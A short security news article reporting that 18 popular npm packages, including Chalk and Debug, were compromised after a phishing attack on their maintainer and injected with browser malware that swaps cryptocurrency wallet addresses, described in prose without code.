Cybercriminals Compromise 18 Highly Popular npm Packages, Accumulating 2 Billion Weekly Downloads

ByAdmin

In a significant supply chain attack, hackers compromised 18 popular npm packages, which collectively account for over two billion downloads per week. The attack commenced on September 8th and involved the injection of malicious code aimed at stealing cryptocurrency from users. Among the compromised packages were widely used libraries such as Chalk, Debug, Ansi-Styles, and Supports-Color. The malicious code was integrated into new versions of these packages, designed to execute on the client-side of websites utilising them. This malware operates as a sophisticated in-browser interceptor, manipulating wallet interactions and rewriting payment destinations to redirect funds to accounts controlled by the attackers. It hooks into core browser functions like Fetch and XMLHttpRequest, as well as interfaces for popular crypto wallets across various blockchains, including Ethereum and Solana.

The malware executes a series of steps to achieve its objectives. Initially, it embeds itself into the browser environment, taking control of functions related to web requests and wallet communications. It actively scans network responses and transaction details for patterns matching cryptocurrency wallet addresses across multiple blockchains, including Bitcoin and Litecoin. Upon identifying a legitimate address, the malware replaces it with a look-alike address from a hardcoded list belonging to the attackers, utilising string-matching algorithms to make the swap less noticeable. The code also alters transaction parameters before users sign them, ensuring that even if the user interface displays the correct recipient address, the signed transaction routes funds to the attackers. The maintainer of the compromised packages revealed that they fell victim to a phishing attack, receiving an email that appeared to be from npm support, which tricked them into revealing their credentials. Although the maintainer began removing the malicious versions, at least one package, Simple-Swizzle, remained compromised at the time of the report. 

Categories: Supply Chain Attack, Malicious Code Injection, Phishing Attack 

Tags: Supply Chain Attack, npm Packages, Malicious Code, Cryptocurrency, Browser Interceptor, Phishing Attack, Wallet Addresses, Transaction Hijacking, Network Traffic, Blockchain 

Leave a Reply

Your email address will not be published. Required fields are marked *